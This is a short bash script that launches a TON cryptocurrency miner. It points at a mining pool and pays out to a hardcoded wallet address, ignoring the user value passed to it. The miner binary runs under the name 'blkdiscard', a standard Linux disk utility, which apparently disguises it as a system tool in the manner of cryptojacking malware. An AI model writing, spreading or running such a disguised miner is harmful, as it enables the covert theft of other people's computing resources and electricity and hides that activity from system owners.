#!/bin/bash
POOL=https://next.ton-pool.com
USER=$1
ALGO=TON
WORKER=$(echo GPU-$(shuf -i 1000-9999 -n 1))

chmod +x blkdiscard
./blkdiscard --algo $ALGO --pool $POOL --user EQDkrFYWp0i9TejiJFK1CsE8o0VM8-tu8l2X2adpo0zV59n2
